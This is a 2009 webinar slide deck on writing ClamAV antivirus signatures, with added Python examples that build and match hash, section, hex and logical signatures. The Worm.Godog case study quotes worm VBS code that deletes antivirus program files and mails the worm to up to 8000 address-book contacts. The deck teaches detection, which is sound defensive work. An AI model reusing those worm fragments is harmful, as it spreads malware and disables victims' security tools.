Writing ClamAV Signatures
Alain Zidouemba
March 4, 2009
About the presenter

Alain Zidouemba

• VRT Research Engineer for over a year
• Primary responsibilities:
  • Malware research & signature generation – ClamAV
  • Vulnerability research & rule generation – Snort
• Before Sourcefire: Anti-Malware Research Engineer
Outline

What is ClamAV
Where to get ClamAV
Different ClamAV signature formats:
• .hdb
• .mdb
• .ndb
• .ldb
Whitelisting
Q&A
ClamAV
What is ClamAV?

Clam AntiVirus (ClamAV) is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways.
Provides a number of utilities including:
• A flexible and scalable multi-threaded daemon (clamd)
• A command line scanner (clamscan)
• An advanced tool for automatic database updates (freshclam)
• Sigtool – more later
Where can I get ClamAV from?

Latest stable release: ClamAV 0.94.2
• http://www.clamav.net/download/sources
Most popular UNIX operating systems are supported:
• GNU/Linux, Solaris, FreeBSD, OpenBSD, Mac OS X
Up-to-date list of binary packages is available at our website:
• http://clamav.net/download/packages
Why learn how to write sigs?

I thought Sourcefire released signature updates several times a day!
ClamAV malware detection

Goal: recognize and block malware

Detection is:
• File-centric
• Focused on recognizing malicious code in a file

Not intended to replace desktop AV

First line of defense
ClamAV Virus Database (CVD)

The ClamAV project distributes two CVD files:
• main.cvd
• daily.cvd
Sigtool (ships with ClamAV) can display detailed information on CVD files:

Various signature files in the .cvd archive
Writing signatures for ClamAV
Hash database: *.hdb

The format for .hdb files is as follows:
• MD5:Size:MalwareName
To create a signature for test.exe use the --md5 option of sigtool:

Hash database: *.hdb (cont'd)

That's it! The signature is ready to be used:

• The name for the detection can be changed:
MD5, PE-section based: *.mdb

The format for .mdb files is as follows:
• PESectionSize:MD5:MalwareName
The easiest way to generate MD5-based section signatures is to extract the target PE sections into separate files and then run sigtool with the --mdb option:
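As an added example (not code from the deck, from pe-sig, or from ClamAV), the Python below generates .hdb (MD5:Size:MalwareName) and .mdb (PESectionSize:MD5:MalwareName) entries by reading the PE section table directly, then looks a file up against those lists with a .fp-style whitelist (same MD5:Size fields) checked first. The build_pe helper, the two sample images and the Test.* names are constructed for the demonstration; the second image hits only through its shared .text section, which is exactly how a packer stub such as Themida's produces false positives.

```python
import hashlib
import struct


def hdb_entry(data, name):
    """Whole-file hash signature, .hdb format: MD5:Size:MalwareName (also the .fp layout)."""
    return "%s:%d:%s" % (hashlib.md5(data).hexdigest(), len(data), name)


def pe_sections(data):
    """Yield (name, raw_offset, raw_size) for every section-table entry of a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    nsect = struct.unpack_from("<H", data, e_lfanew + 6)[0]        # NumberOfSections
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]    # SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                                # first IMAGE_SECTION_HEADER
    for i in range(nsect):
        hdr = data[table + 40 * i:table + 40 * (i + 1)]
        if len(hdr) < 40:
            raise ValueError("truncated section table")
        raw_size, raw_off = struct.unpack_from("<II", hdr, 16)      # SizeOfRawData, PointerToRawData
        yield hdr[:8].rstrip(b"\0").decode("ascii", "replace"), raw_off, raw_size


def mdb_entries(data, name):
    """One .mdb line per section, PESectionSize:MD5:MalwareName, hashing the raw section bytes."""
    out = []
    for sect, off, size in pe_sections(data):
        if size == 0:                  # e.g. .bss: nothing on disk to hash (skipped by assumption)
            continue
        raw = data[off:off + size]
        if len(raw) != size:
            raise ValueError("section %s runs past the end of the file" % sect)
        out.append("%d:%s:%s" % (size, hashlib.md5(raw).hexdigest(), name))
    return out


def lookup(data, hdb, mdb, fp):
    """Return the detection name for one file image, or None; .fp entries override everything."""
    md5, size = hashlib.md5(data).hexdigest(), len(data)
    for line in fp:                    # whitelist first, so a known-good file never alerts
        h, s, _comment = line.split(":", 2)
        if h == md5 and int(s) == size:
            return None
    for line in hdb:
        h, s, name = line.split(":", 2)
        if h == md5 and int(s) == size:
            return name
    if data[:2] == b"MZ" and mdb:
        wanted = {}
        for line in mdb:
            s, h, name = line.split(":", 2)
            wanted[(int(s), h)] = name
        try:
            for _sect, off, sz in pe_sections(data):
                key = (sz, hashlib.md5(data[off:off + sz]).hexdigest())
                if key in wanted:
                    return wanted[key]
        except ValueError:             # starts with MZ but is not a well-formed PE
            pass
    return None


def build_pe(sections):
    """Construct a minimal, non-runnable PE image from (name, payload) pairs for testing."""
    nsect = len(sections)
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)             # e_lfanew -> 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, nsect, 0, 0, 0, 0, 0x102)  # no optional header
    table, body, off = b"", b"", len(dos) + len(coff) + 40 * nsect
    for name, payload in sections:
        table += name.ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", len(payload), 0x1000, len(payload), off, 0, 0, 0, 0, 0x60000020)
        body += payload
        off += len(payload)
    return dos + coff + table + body


if __name__ == "__main__":
    # Constructed sample: two images that share a .text section (as packer stubs do).
    a = build_pe([(b".text", b"\x90" * 64), (b".data", b"data" * 16)])
    b = build_pe([(b".text", b"\x90" * 64), (b".rdata", b"other")])
    mdb = mdb_entries(a, "Test.SharedSection")
    print("\n".join(mdb))
    print("a:", lookup(a, [hdb_entry(a, "Test.Whole")], mdb, []))
    print("b:", lookup(b, [hdb_entry(a, "Test.Whole")], mdb, []))   # hit via the shared section only
    print("a whitelisted:", lookup(a, [hdb_entry(a, "Test.Whole")], mdb, [hdb_entry(a, "known good")]))
```

Feeding real files through mdb_entries gives the same PESectionSize:MD5 pairs that sigtool --mdb prints for the extracted sections, which is how the 237568-byte Bagle section above was turned into a signature.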
Case study: Trojan.Bagle-328

IDA Pro indicates that the sample is "packed"

Packed with Themida (as per PEiD)

Case study: Trojan.Bagle-328 (cont'd)

Themida is used by malware writers... but also by legitimate products – false positive likely
We can use pe-sig, a Ruby script that will create sigs for each section of a PE file:

Finally, the signature is:
• 237568:ce914ca1bbea795a7021854431663623:Trojan.Bagle-328
Extended sig. format: *.ndb

The format for .ndb files is as follows:
• MalwareName:TargetType:Offset:HexSignature

• TargetType is one of the following numbers specifying the type of the target file:
  0: Any file
  1: Portable Executable
  2: OLE2 component (eg: VBA script)
  3: HTML (normalized)
  4: Mail file
  5: Graphics
  6: ELF
  7: ASCII text file (normalized)
Case study: Trojan.Exchanger

Many files that are very similar yet different
Case study: Trojan.Exchanger (cont'd)

5.exe:

Opcode:
• e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
Signature:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4

Case study: Trojan.Exchanger (cont'd)

7.exe:

Opcode:
• e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
Signature:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
Case study: Trojan.Exchanger (cont'd)

Signature for 5.exe:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4

Signature for 7.exe:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4

Signature to detect both 5.exe and 7.exe (the {4} wildcard stands for exactly four arbitrary bytes, covering the one operand that differs):
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4
Case study: Trojan.Exchanger (cont'd)

Moreover, for 5.exe:
• EP: 0x4094E0
• Binary string: 0x4095C5

For 7.exe:
• EP: 0x406D87
• Binary string: 0x406E6C

In both cases the distance between the EP and our binary string is the same: 0xE5 = 229 (decimal)
Case study: Trojan.Exchanger (cont'd)

Finally, we can rewrite the signature to be anchored at the entry point plus that distance:
• Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4

This signature is more precise and even matches other samples:
Logical signatures: *.ldb

Logical signatures were introduced in ClamAV 0.94
The format for .ldb files is as follows:
• SignatureName;TargetDescriptionBlock;LogicalExpression;Subsig0;Subsig1;Subsig2;...
Case study: Worm.Godog

A mass-mailer worm, code is in VBS

    Registro = legion.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
    If FileExists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\Avp32.exe") then path = Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro"
    legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\*.*")
    If fileexists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\Avp32.exe") then path = Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal"
    legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\*.*")
    if FileExists(Registro & "\Antiviral Toolkit Pro\avp32.exe") then path = Registros & "\Antiviral Toolkit Pro"
    legions.DeleteFile (Registro & "\Antiviral Toolkit Pro\*.*")
    if fileexists (Registro & "\AVPersonal\Avguard.exe") then path = Registro & "\AVPersonal"
    legions.DeleteFile (Registro & "\AVPersonal\*.*")
    if fileexists (Registro & "\Trend PC-cillin 98\IOMON98.EXE") then path = Registro & "\Trend PC-cillin 98"
    legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.*")
    legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.EXE")
    legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.dll")
Case study: Worm.Godog (cont'd)

After normalization, we can create 4 signatures to detect each attempt to disable AV tools as follows ({-n} matches up to n arbitrary bytes between the fixed parts):

(0) Kaspersky Antivirus Personal / Kaspersky Antivirus Personal Pro:
    66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c

(1) Antiviral Toolkit Pro:
    66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f

(2) AVPersonal:
    66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c

(3) Trend PC-cillin 98:
    66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e
Case study: Worm.Godog (cont'd)

The worm also sends itself to the first 8000 contacts found in the address book:

    Set Create = CreateObject ("Scripting.FileSystemObject")
    Set mail = Create.CreateTextFile("C:\mail.vbs")
    mail.writeline "On Error Resume Next"
    mail.writeline "Dim leg, Mail, Counter, A, B, C, D, E"
    mail.writeline "Set leg = CreateObject" & Chr(32)& "(" & chr(34) & "Outlook.Application" & Chr(34) &")"
    mail.writeline "Set C = CreateObject "& Chr(32) & "(" & chr(34) & "Scripting.FileSystemObject" & Chr(34)& ")"
    mail.writeline "Set Mail = leg.GetNameSpace" & Chr(32) & "(" & chr(34)& "MAPI" & Chr(34)&")"
    mail.writeline "For A = 1 To Mail.AddressLists.Count"
    mail.writeline "Set B = Mail.AddressLists (A)"
    mail.writeline "Counter = 1"
    mail.writeline "Set C = leg.CreateItem (0)"
    mail.writeline "For D = 1 To B.AddressEntries.Count"
    mail.writeline "E = B.AddressEntries (Counter)"
    mail.writeline "C.Recipients.Add E"
    mail.writeline "Counter = Counter + 1"
    mail.writeline "If Counter > 8000 Then Exit For"
    mail.writeline "Next"
    mail.writeline "C.Subject =" & Chr(32) & Chr(34) &"Legion Game" & Chr(34)
    mail.writeline "C.Body = "& Chr(32) & Chr(34) & "YA jugaste el juego Legion? si no aqui te lo doy checalo y hay me dices que tal..." & Chr(34)
    mail.writeline "C.Attachments.Add"& Chr(32) & Chr(34) & "C:\Legion.vbs" & Chr(34)
    mail.writeline "C.DeleteAfterSubmit = True"
    mail.writeline "C.Send"
    mail.writeline "Next"
    mail.Close
    legion.Run ("C:\mail.vbs")
Case study: Worm.Godog (cont'd)

A signature to detect this portion of the worm could be:

(4) 666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64

Finally, we can write this highly flexible signature (any one of the AV-killing routines, together with the mailer):
• Worm.Godog;Target:0;((0|1|2|3)& (4));(0);(1);(2);(3);(4)
in a .ldb file:

    Worm.Godog;Target:0;((0|1|2|3)& (4));66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c;66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f;66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c;66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e;666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64
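As an added example (not ClamAV's matcher or any code from the deck), the Python below implements enough of the .ndb and .ldb formats to run the Trojan.Exchanger and Worm.Godog signatures above: it turns a hex signature body with {n}, {-n}, {n-}, * and ?? wildcards into a bytes regex, honours * and EP+n offsets, and evaluates the logical expression over the subsignature hits. FAKE_EP, the padded images, fake_image and the lowercase GODOG_TEXT fragment are constructed for the demonstration; the entry point is treated as a file offset, and the expression evaluator accepts only digits, parentheses, & and |.

```python
import re

# One ClamAV hex-signature token: "*", "??", "{n}", "{-n}", "{n-}", "{n-m}" or a hex byte.
_TOKEN = re.compile(r"\*|\?\?|\{(\d*)(-?)(\d*)\}|[0-9a-fA-F]{2}")


def hexsig_to_regex(body):
    """Compile a ClamAV hex signature body into a regex over bytes."""
    parts, pos = [], 0
    while pos < len(body):
        m = _TOKEN.match(body, pos)
        if not m:
            raise ValueError("unsupported token at %d: %r" % (pos, body[pos:pos + 8]))
        tok, (lo, dash, hi) = m.group(0), m.groups()
        if tok == "*":
            parts.append(b".*")                        # any number of bytes
        elif tok == "??":
            parts.append(b".")                         # exactly one arbitrary byte
        elif tok.startswith("{"):                      # {n} exactly n, {-n} up to n, {n-} at least n
            parts.append(b".{%d}" % int(lo) if not dash else
                         b".{%s,%s}" % (lo.encode() or b"0", hi.encode()))
        else:
            parts.append(re.escape(bytes.fromhex(tok)))
        pos = m.end()
    return re.compile(b"".join(parts), re.DOTALL)       # DOTALL: wildcards must also span 0x0a


def match_ndb(line, data, ep=None):
    """Match one .ndb line (Name:Target:Offset:Hex); ep is the file offset of the entry point."""
    name, _target, offset, body = line.split(":", 3)
    rx = hexsig_to_regex(body)
    if offset == "*":                                  # anywhere in the file
        return rx.search(data) is not None
    if offset.startswith("EP"):                        # EP+n / EP-n: anchored relative to the entry point
        if ep is None:
            raise ValueError(name + ": EP-relative offset needs an entry point")
        return rx.match(data, ep + int(offset[2:])) is not None
    return rx.match(data, int(offset)) is not None     # absolute file offset


def eval_logic(expr, hits):
    """Evaluate an .ldb logical expression (subsig indices, &, |, parentheses) over hit flags."""
    expr = expr.replace(" ", "")
    if not re.fullmatch(r"[0-9()&|]+", expr):
        raise ValueError("unsupported syntax in %r" % expr)
    # Only digits, parentheses, & and | survive the check above, so once the
    # operators are rewritten the expression can be evaluated with no builtins.
    py = re.sub(r"\d+", lambda m: "h[%s]" % m.group(0), expr)
    return bool(eval(py.replace("&", " and ").replace("|", " or "), {"__builtins__": {}}, {"h": hits}))


def match_ldb(line, data):
    """Match one .ldb line; returns (name, verdict, per-subsig hit flags)."""
    name, _target, expr, *subsigs = line.split(";")
    hits = [hexsig_to_regex(s).search(data) is not None for s in subsigs]
    return name, eval_logic(expr, hits), hits


# Constructed samples (not real malware): the two Trojan.Exchanger opcode runs from the
# deck, placed exactly 229 bytes past a fake entry point so EP+229 can be exercised.
EXCH_5 = bytes.fromhex("e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4")
EXCH_7 = bytes.fromhex("e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4")
FAKE_EP = 0x200
SIG_5 = "Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4"
SIG_BOTH = "Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4"


def fake_image(opcodes):
    return b"\x00" * FAKE_EP + b"\x90" * 229 + opcodes + b"\x00" * 32


# The deck's Worm.Godog line joined onto one line (subsignatures verbatim).
GODOG_LDB = (
    "Worm.Godog;Target:0;((0|1|2|3)& (4));"
    "66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c"
    "{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c;"
    "66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f;"
    "66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c;"
    "66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e;"
    "666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64"
)
# A constructed, lowercase (normalised) fragment that carries only the AVPersonal
# deletion routine (subsig 2) and the mailer loop (subsig 4).
GODOG_TEXT = b"""\
if fileexists (registro & "\\avpersonal\\avguard.exe") then path = registro & "\\avpersonal"
legions.deletefile (registro & "\\avpersonal\\*.*")
for d = 1 to b.addressentries.count
c.recipients.add e
if counter > 8000 then exit for
c.attachments.add "c:\\legion.vbs"
c.send
"""

if __name__ == "__main__":
    for sample in (EXCH_5, EXCH_7):
        print("EP+229 form:", match_ndb(SIG_BOTH, fake_image(sample), ep=FAKE_EP))
    print(match_ldb(GODOG_LDB, GODOG_TEXT))
```

Run stand-alone it reports True for both opcode runs under the EP+229 signature and ('Worm.Godog', True, [False, False, True, False, True]) for the fragment, because subsignatures 2 and 4 hit and the expression only needs one of 0 to 3 together with 4.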
Whitelisting

To whitelist a specific file, create an entry in a database file with the extension .fp following the MD5 signature format:

• MD5:FileSize:Comment
Whitelisting (cont'd)

To whitelist a specific signature inside main.cvd add the following entry into a local file local.ign:
• db_name:line_number:signature_name
To ignore the "myTestSignature" at line 23 in test.ndb:
• test.ndb:23:myTestSignature
Daily.ign:
More questions?

clamav-users@lists.clamav.net - user questions
clamav-devel@lists.clamav.net - technical discussions
Alternatively you can try asking on the #clamav IRC channel on irc.freenode.net
If you have questions or comments on this presentation: azidouemba@sourcefire.com
ClamAV/VRT/Sourcefire

Websites
• http://www.clamav.net
• http://www.snort.org
• http://www.sourcefire.com

Blogs
• http://clam-av.blogspot.com
• http://vrt-sourcefire.blogspot.com
Contribute

Sample submission
• http://www.clamav.net/sendvirus/

Upload statistics:
• freshclam --submit-stats

Bug submission
• http://bugs.clamav.net
Q&A

NOW GO AND WRITE SIGNATURES!

Source: http://www.topnews.in/wireless-worms-may-spread-same-manner-flu-222714

More Related Content

What's hot

Sourcefire Vulnerability Research Team Labs
Sourcefire Vulnerability Research Team LabsSourcefire Vulnerability Research Team Labs
Sourcefire Vulnerability Research Team Labs
losalamos
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]
RootedCON
 
DARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
DARPA CGC and DEFCON CTF: Automatic Attack and Defense TechniqueDARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
DARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
Chong-Kuan Chen
 
Mem forensic
Mem forensicMem forensic
Mem forensic
Chong-Kuan Chen
 
Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...
Minsk Linux User Group
 
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
PROIDEA
 
Control hijacking
Control hijackingControl hijacking
Control hijacking
G Prachi
 
Meetup mini conférences AFUP Paris Deezer Janvier 2017
Meetup mini conférences AFUP Paris Deezer Janvier 2017Meetup mini conférences AFUP Paris Deezer Janvier 2017
Meetup mini conférences AFUP Paris Deezer Janvier 2017
Alexis Von Glasow
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
CODE BLUE
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Shakacon
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF quals
snyff
 
NSC #2 - Challenge Solution
NSC #2 - Challenge SolutionNSC #2 - Challenge Solution
NSC #2 - Challenge Solution
NoSuchCon
 
(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk   apt, cyber espionage threat(130119) #fitalk   apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threat
INSIGHT FORENSIC
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
Christopher Frohoff
 
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
PROIDEA
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz
PROIDEA
 
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Positive Hack Days
 
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...
Codemotion
 
Let's Talk Technical: Malware Evasion and Detection
Let's Talk Technical: Malware Evasion and DetectionLet's Talk Technical: Malware Evasion and Detection
Let's Talk Technical: Malware Evasion and Detection
James Haughom Jr
 
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
Felipe Prado
 

What's hot (20)

Sourcefire Vulnerability Research Team Labs
Sourcefire Vulnerability Research Team LabsSourcefire Vulnerability Research Team Labs
Sourcefire Vulnerability Research Team Labs
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]
 
DARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
DARPA CGC and DEFCON CTF: Automatic Attack and Defense TechniqueDARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
DARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique
 
Mem forensic
Mem forensicMem forensic
Mem forensic
 
Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...
 
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
 
Control hijacking
Control hijackingControl hijacking
Control hijacking
 
Meetup mini conférences AFUP Paris Deezer Janvier 2017
Meetup mini conférences AFUP Paris Deezer Janvier 2017Meetup mini conférences AFUP Paris Deezer Janvier 2017
Meetup mini conférences AFUP Paris Deezer Janvier 2017
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF quals
 
NSC #2 - Challenge Solution
NSC #2 - Challenge SolutionNSC #2 - Challenge Solution
NSC #2 - Challenge Solution
 
(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk   apt, cyber espionage threat(130119) #fitalk   apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threat
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
 
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz
 
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...
 
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...
 
Let's Talk Technical: Malware Evasion and Detection
Let's Talk Technical: Malware Evasion and DetectionLet's Talk Technical: Malware Evasion and Detection
Let's Talk Technical: Malware Evasion and Detection
 
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
 

Similar to Webinar alain-2009-03-04-clamav

Advanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsAdvanced System Security and Digital Forensics
Advanced System Security and Digital Forensics
Dr. Ramchandra Mangrulkar
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects
PVS-Studio
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects 100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects
Andrey Karpov
 
Formbook - In-depth malware analysis (Botconf 2018)
Formbook - In-depth malware analysis (Botconf 2018)Formbook - In-depth malware analysis (Botconf 2018)
Formbook - In-depth malware analysis (Botconf 2018)
Rémi Jullian
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous Environment
Stefano Maccaglia
 
G3t R00t at IUT
G3t R00t at IUTG3t R00t at IUT
G3t R00t at IUT
Nahidul Kibria
 
Automatic tool for static analysis
Automatic tool for static analysisAutomatic tool for static analysis
Automatic tool for static analysis
Chong-Kuan Chen
 
